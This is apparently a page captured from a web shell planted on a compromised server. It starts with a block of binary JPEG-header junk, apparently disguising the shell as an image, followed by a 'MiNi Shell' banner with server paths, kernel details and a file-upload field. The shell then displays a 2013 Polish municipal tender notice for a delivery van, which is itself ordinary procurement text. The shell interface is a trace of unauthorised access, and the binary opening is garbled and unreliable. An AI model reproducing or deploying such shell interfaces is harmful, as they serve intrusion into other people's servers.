JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130620/236630-N-2013.html

<p class="kh_header"><b>Stalowa Wola: Dostawa samochodu ciężarowego typu furgon o dopuszczalnej
masie całkowitej do 3,5t</b><br>
<b>Numer ogłoszenia: 236630 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Hutnicza 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 8422562, 8447338, faks 015 8422562, 8447338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mosir.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodu ciężarowego typu furgon o dopuszczalnej
masie całkowitej do 3,5t.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa samochodu ciężarowego typu furgon o masie całkowitej do 3,5 tony, fabrycznie nowego wyprodukowanego nie wcześniej niż w roku 2013.

1.1 Informacje podstawowe:
Rok produkcji, nie wcześniej niż - 2013,
 Dopuszczalna masa całkowita pojazdu - 3,5 tony,  Rodzaj pojazdu - furgon,  Kabina - pojedyncza, tj. kierowca + 2 pasażerów 

1.2 Wymiary: 
1) całkowita długość pojazdu nie większa niż - 6,20 m, 
2) całkowita wysokość maksymalna pojazdu nieobciążonego nie większa jak - 2,80 m, 
3) minimalna długość przestrzeni towarowej - 3,20 m mierząc przy podłodze pojazdu, 
4) minimalna wysokość przestrzeni ładunkowej - 1,89 m, 
5) minimalna szerokość przestrzeni ładunkowej między nadkolami - 1,30m, 
6) minimalna pojemność przestrzeni ładunkowej - 10 m3. 

1.3 Ładowność:
1) minimalna ładowność pojazdu gotowego do drogi (użytkowa) - 1400 kg. 

1.4 Jednostka napędowa (silnik), skrzynia biegów, komora silnika: 
1) silnik wysokoprężny, czterosuwowy z turbiną doładowującą, 
2) spełniająca wymagania europejskiej normy emisji spalin, co najmniej EURO 5, 
3) minimalna moc - 142 KM (~105 KW), 4) skrzynia biegów manualna lub automatyczna, 
5) ilość przełożeń skrzyni biegów do przodu - minimum 5 + bieg wsteczny, 
6) osłona dolna silnika. 

1.5 Wyposażenie: 
 1) jeden komplet opon letnich na felgach stalowych i jeden komplet opon zimowych na felgach stalowych (opony + felgi stalowe z podstawowymi-seryjnymi kołpakami), przy czym wymiary felg (obręczy stalowych) a tym samym opon zgodne z oferowanymi 
przez wykonawcę w danym modelu pojazdu wyposażonego seryjnie, opony nie starsze niż z roku produkcji pojazdu, 
2)  światła do jazdy dziennej zgodne z obowiązującymi w Polsce przepisami oraz zamontowane i działające zgodnie z nimi,
3)  elektrycznie sterowane szyby w drzwiach przednich bocznych, 
4)  elektrycznie regulowane i podgrzewane lusterka boczne, 
5)  system wspomagający przy parkowaniu (czujniki cofania lub kamera cofania z monitorem), 
6)  ABS z EBD lub jego odpowiednikiem, 
7)  radio z odtwarzaczem CD lub USB oraz kompletną, działającą instalacją (głośniki, antena), 
8) centralny zamek sterowany kluczem z zintegrowanym pilotem radiowym oraz kluczem zapasowym - zamawiający wprowadza punktację za posiadanie w ofercie wykonawcy klucza zapasowego z zintegrowanym pilotem zgodnie z Rozdz. V pkt. 1 SIWZ, 
9) wycieraczki przedniej szyby - dwie prędkości pracy (praca standartowa i szybka) + tryb czasowy (regulacja czasowa pracy wycieraczek, względnie praca wycieraczek zarządzana sterownikiem sprzęgniętym z czujnikiem deszczu),
10) klimatyzacja przedziału kabiny kierowcy i pasażerów, 
11) szyba przednia atermiczna zgodna z obowiązującymi przepisami, nie jest wymagana ale zamawiający wprowadza punktację za jej posiadanie w ofercie wykonawcy zgodnie z Rozdz. V pkt. 1 SIWZ, 
12) półka nad szybą przednią, 
13) kieszeń, co najmniej w drzwiach kierowcy oraz przynajmniej jeden schowek zamykany w kabinie umożliwiający schowanie dokumentów w formacie A4, 
14) podstawka do sporządzania notatek oraz przytrzymująca dokumenty (faktury, listy zamówień) stanowiąca część wyposażenia oryginalnego pojazdu, umieszczona na kokpicie i znajdująca się w zasięgu kierowcy nie jest obowiązkowa, ale Zamawiający wprowadza punktację za jej posiadanie w ofercie wykonawcy zgodnie z Rozdz. V pkt. 1 SIWZ, 
15) kierownica z regulacją wysokości-pochylenia w płaszczyźnie pionowej, 
16) wspomaganie kierownicy, 
17) poduszka powietrzna co najmniej dla kierowcy, 
18) fotel kierowcy z regulacją w płaszczyźnie poziomej, pionowej, regulacją pochylenia oparcia, regulacją podparcia odcinka lędźwiowego,
19) trzypunktowe, bezwładnościowe pasy bezpieczeństwa dla pasażerów oraz dla kierowcy z regulacją wysokości, siedzenia z zagłówkami, 
20) przegroda między kabiną kierowcy a przestrzenią ładunkową - pełna, stała z centralnie umieszczonym przeszkleniem, 
21) oświetlenie przestrzeni ładunkowej, 
22) uchwyty na podłodze pojazdu do mocowania ładunku - co najmniej 6 punktów mocowania, 
23) uchwyty mocowane do ściany pionowej pojazdu lub otwory umożliwiające zabezpieczenie linkami lub pasami, co najmniej 4 szt. od 10-cio do 20 litrowych zbiorników na płyny (kanistry) przed przewróceniem na czas transportu, 
24) drzwi tylne dwuskrzydłowe - Zamawiający wprowadza punktację za posiadanie w ofercie Wykonawcy drzwi otwieranych  o 250-270 st. zgodnie z Rozdz. V pkt. 1, 
25) zabezpieczenie przestrzeni ładunkowej np. sklejką wodoodporną przed uszkodzeniami mechanicznymi - podłoga, nadkola, drzwi, ściany na wysokość nie mniejszą jak 1,50m, 
26) pełne nadkola z tworzywa sztucznego lub inne dodatkowe zabezpieczenie nadkoli pojazdu od strony zewnętrznej, np. w postaci nałożenia dodatkowej powłoki odpornej na uderzenia kamieni i innych czynników wywołujących korozję elementów metalowych pojazdu, 
27) fartuchy przeciwbłotne na przód oraz tył pojazdu, 
28) zamocowane pełnowymiarowe koło zapasowe, 
29) kolor pojazdu biały lub niebieski, 
30) drzwi boczne przesuwane oraz tylne w przedziale ładunkowym mogą być bez przeszklenia lub z przeszkleniem.
31) Zamawiający dopuszcza montaż dodatkowych drzwi przesuwnych po stronie lewej pojazdu. 

1.6 Wymagania gwarancyjne i pogwarancyjne: 

1)  min. 2 lata gwarancji bez limitu kilometrów na wszystkie zespoły i podzespoły bez wyłączeń - obejmującej prawidłowe funkcjonowanie samochodu, wady fabryczne i podzespoły, 
2)  min. 2 lata gwarancji na powłokę lakierniczą, 
3)  min 5 lat gwarancji na perforację karoserii, 
4) okres gwarancji rozpocznie bieg od dnia podpisania bez zastrzeżeń przez obie strony protokołu zdawczo - odbiorczego samochodu, 
5) Wykonawca zapewnia serwis gwarancyjny oferowanego pojazdu, 
6) Jeżeli Wykonawca posiada serwis pojazdu po za granicami miasta, w którym znajduje się siedziba Zamawiającego, to zapewnia on transport przedmiotu zamówienia własnym kosztem i staraniem na miejsce, w którym wykonane będą czynności serwisowe lub dokonywane naprawy w okresie obowiązywania gwarancji a następnie odstawia przedmiot zamówienia po wykonaniu ww. czynności do siedziby Zamawiającego w godzinach jego pracy z zastrzeżeniem pozostałych warunków wymienionych w niniejszej SIWZ, 
7) Wykonawca w trakcie trwania gwarancji zobowiązuje się do niezwłocznego transportu pojazdu w przypadku jego unieruchomienia zgłoszonego telefonicznie, we własnym zakresie do najbliższego serwisu zgodnego z książką gwarancyjną, celem usunięcia powodu unieruchomienia. W przypadku konieczności pozostawienia pojazdu w miejscu naprawy, Wykonawca zapewnia Zamawiającemu pojazd zastępczy - Zamawiający wprowadza punktację za zaakceptowanie w ofercie Wykonawcy powyższego warunku, zgodnie z Rozdz. V pkt. 1 SIWZ
8) Zamawiający nie może być dodatkowo obciążony finansowo ani w inny sposób w trakcie trwania gwarancji, transportem przedmiotu zamówienia, jeżeli wynika on z konieczności wykonania prac serwisowych bądź konieczności przeprowadzenia napraw gwarancyjnych (1.6 ust. 6 i 7), 9) czas reakcji Wykonawcy na realizację zgłoszenia Zamawiającego o usterce lub konieczności wykonania innych czynności przy przedmiocie zamówienia nie może być dłuższy niż 24 godziny licząc od odebrania informacji przez Wykonawcę o usterce, awarii, bądź uszkodzeniu pojazdu z wyjątkiem sytuacji wymienionej w 1.6 ust. 7, czyli w przypadku unieruchomienia pojazdu (jeżeli Wykonawca zaakceptował warunek),
10) czas, w jakim winny być wykonane zaplanowane przez producenta pojazdu czynności serwisowe nie może być dłuższy niż 1 dzień chyba, że pojazd wymaga wykonania nieprzewidzianych dodatkowych czynności serwisowych bądź wykonania niezbędnych napraw, zgłoszonych usterek lub innych wad pojazdu, wówczas Wykonawca informuje o tym fakcie Zamawiającego podając termin realizacji usługi, który nie może być dłuższy niż 14 dni, 11) okres gwarancji zostaje wydłużony o czas niesprawności samochodu, liczony od dnia pisemnego zgłoszenia awarii do dnia zwrotu pojazdu po naprawie, 12) na czas trwania naprawy gwarancyjnej oraz w ww. przypadkach podanych w 1.6 niniejszej SIWZ, w ramach wynagrodzenia, o którym mowa w §2 ust. 1 umowy stanowiącej załącznik do niniejszego SIWZ Wykonawca udostępni Zamawiającemu samochód zastępczy, 
13) Wszelkie koszty związane ze świadczeniem usług gwarancyjnych ponosi Wykonawca. 
 
1.7 Pozostałe wymagania: 

1) karta pojazdu, 
2) instrukcja obsługi i eksploatacji pojazdu w języku polskim, 
3) karta gwarancyjna z listą punktów serwisowych na terenie polski, 
4) atestowana gaśnica, 
5) trójkąt ostrzegawczy, 
6) książka przeglądów, 
7) apteczka pierwszej pomocy, 
8) linka holownicza, 
9) gniazdo zapalniczki 12V wraz z zapalniczką w kabinie kierowcy, 
10) przewody rozruchowe, 
11) podnośnik samochodowy stanowiący oryginalne wyposażenie pojazdu, 
12) klucz służący do wymiany koła stanowiący oryginalne wyposażenie pojazdu, 
13) (kliny) szt. 2 podkładane pod koło podczas podnoszenia pojazdu podnośnikiem, 
14) komplet zapasowych bezpieczników, 
15) komplet żarówek w opakowaniu do awaryjnej wymiany, 
16) komplet narzędzi umożliwiających awaryjną wymianę żarówek oraz bezpieczników w pojeździe, 
17) dywaniki z tworzywa sztucznego pod nogi kierowcy i pasażerów zabezpieczające oryginalną podłogę pojazdu,
18) pojazd winien posiadać ważną homologację (należy dostarczyć wyciąg ze świadectwa homologacji pojazdu zgodnie z umową)  i spełniać pozostałe warunki dopuszczające go do ruchu po drogach publicznych jak wymagania techniczne wynikające z ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (tj. Dz.U. z 2005 r., Nr 108, poz. 908  z późn. zm.) w taki sposób, aby możliwa była jego rejestracja zgodnie z wymaganiami Zamawiającego, tj. przewóz trzech osób wraz z kierowcą i ładunkiem (stosowny dokument j.w. w tym zakresie Wykonawca jest zobowiązany dostarczyć przy dostawie przedmiotu zamówienia), 
19) Wykonawca dostarczy wraz z przedmiotem zamówienia wszystkie dokumenty niezbędne do zarejestrowania pojazdu, 
20) pojazd należy dostarczyć w stanie gotowym do użytkowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.13.61.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca w ciągu ostatnich 3 lat przed wszczęciem postępowania o
udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
wykonał, co najmniej dwa zadania odpowiadające swoim rodzajem i wartością usłudze stanowiącej
przedmiot zamówienia. Przez zadanie odpowiadające swoim rodzajem przedmiotowi zamówienia
rozumie się dostawę fabrycznie nowego samochodu ciężarowego-dostawczego o masie całkowitej do 3,5 t. Warunek:
spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dostawca spełni powyższy warunek, jeżeli wykaże się posiadaniem środków lub zdolności kredytowej w wysokości co najmniej 200 000,00 złotych. Warunek: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych dostaw wg według wzoru, stanowiącego Załącznik nr 7 do SIWZ, wymienionych w rozdziale III pkt 2.1 lit. d) SIWZ w okresie ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, oraz potwierdzenie, że Wykonawca wykonał
należycie, zlecone dostawy z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentów
potwierdzających, że dostawy te zostały wykonane należycie. Przez zadanie odpowiadające swoim rodzajem
przedmiotowi zamówienia rozumie się dostawę fabrycznie nowego samochodu ciężarowego-dostawczego o masie całkowitej do
3,5t;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Ofertę cenową, o której mowa w Rozdz. IV pkt 1.4 SIWZ.W przypadku składania oferty wspólnej należy złożyć jeden
dokument. b) Pełnomocnictwo o którym mowa w Rozdz. III pkt 4.2 i 4.3 SIWZ (w przypadku Wykonawców składających ofertę
wspólną). Należy złożyć jeden dokument. c) Oświadczenie Wykonawcy o zapoznaniu się z niniejszą SIWZ i załącznikami do
niej- Załącznik nr 6 do SIWZ. W przypadku składania oferty wspólnej należy złożyć jeden dokument. d) Oświadczenie
Wykonawcy o udzieleniu gwarancji - Załącznik nr 5 do SIWZ. W przypadku składania oferty wspólnej należy złożyć jeden
dokument. e) Podwykonawcy - Załącznik nr 8 do SIWZ. W przypadku składania oferty wspólnej należy złożyć jeden dokument.
f) Specyfikacja zamówienia - Załącznik nr 2 do SIWZ W przypadku składania oferty wspólnej należy złożyć jeden dokument. g)
Wzór umowy stanowiący Załącznik nr 9 do niniejszej SIWZ - zaakceptowany zgodnie z wymaganiami niniejszej SIWZ. (jak
pozostałe dokumenty: miejscowość, data, pieczątka i parafka lub czytelny podpis). W przypadku składania oferty wspólnej
należy złożyć jeden dokument. h) Protokół zdawczo-odbiorczy stanowiący Załącznik nr 10 do SIWZ - zaakceptowany zgodnie z
wymaganiami niniejszej SIWZ. (jak pozostałe dokumenty: miejscowość, data, pieczątka i parafka lub czytelny podpis). W
przypadku składania oferty wspólnej należy złożyć jeden dokument. UWAGA: Wszystkie ww. dokumenty należy wypełnić i
załączyć do oferty z wyjątkiem pełnomocnictwa (Rozdz. III pkt 3.8 lit b) SIWZ), jeżeli nie dotyczy. W przypadku braku
podwykonawców (Rozdz. III pkt 3.8 lit e) SIWZ) załączony dokument należy przekreślić, opisać -NIE DOTYCZY- i podpisać
zgodnie z wymaganiami SIWZ jak pozostałe dokumenty (miejscowość, data, pieczątka i parafka lub czytelny podpis).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Posiadanie w ofercie Wykonawcy klucza zapasowego z zintegrowanym pilotem - 1</li>
<li>3 - Posiadanie w ofercie Wykonawcy podstawki do sporządzania notatek - 1</li>
<li>4 - Posiadanie w ofercie  Wykonawcy drzwi otwieranych  o 250-270 st. - 3</li>
<li>5 - Zaakceptowanie w ofercie Wykonawcy warunku wymienionego w Rozdz. II, ust. 4.6 pkt 7 SIWZ - 2</li>
<li>6 - Posiadanie w ofercie Wykonawcy szyby atermicznej (odblaskowej) - 1</li>
<li>7 - Punktacja dotycząca terminu realizacji zamówienia zgodnie z SIWZ, maksymalnie - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>A) zmianę terminu realizacji dostawy ze względu na niemożliwe do przewidzenia przez Zamawiającego niekorzystne
okoliczności takie jak, np.: warunki pogodowe, kataklizmy, zmiany przepisów mających wpływ na niniejsze zamówienie, zmiany
polityczne mające wpływ na niniejsze zamówienie, itp. B) zmiany nieistotne postanowień zawartej umowy, zgodnie z treścią art.
144 ust. 1 Ustawy, C) zmiany danych teleadresowych, np.: siedziby firmy, adresu do korespondencji, numerów telefonów
(stacjonarnych i komórkowych) wynikających z bieżących umów i potrzeb, D) zmianę osób wskazanych w ofercie Wykonawcy,
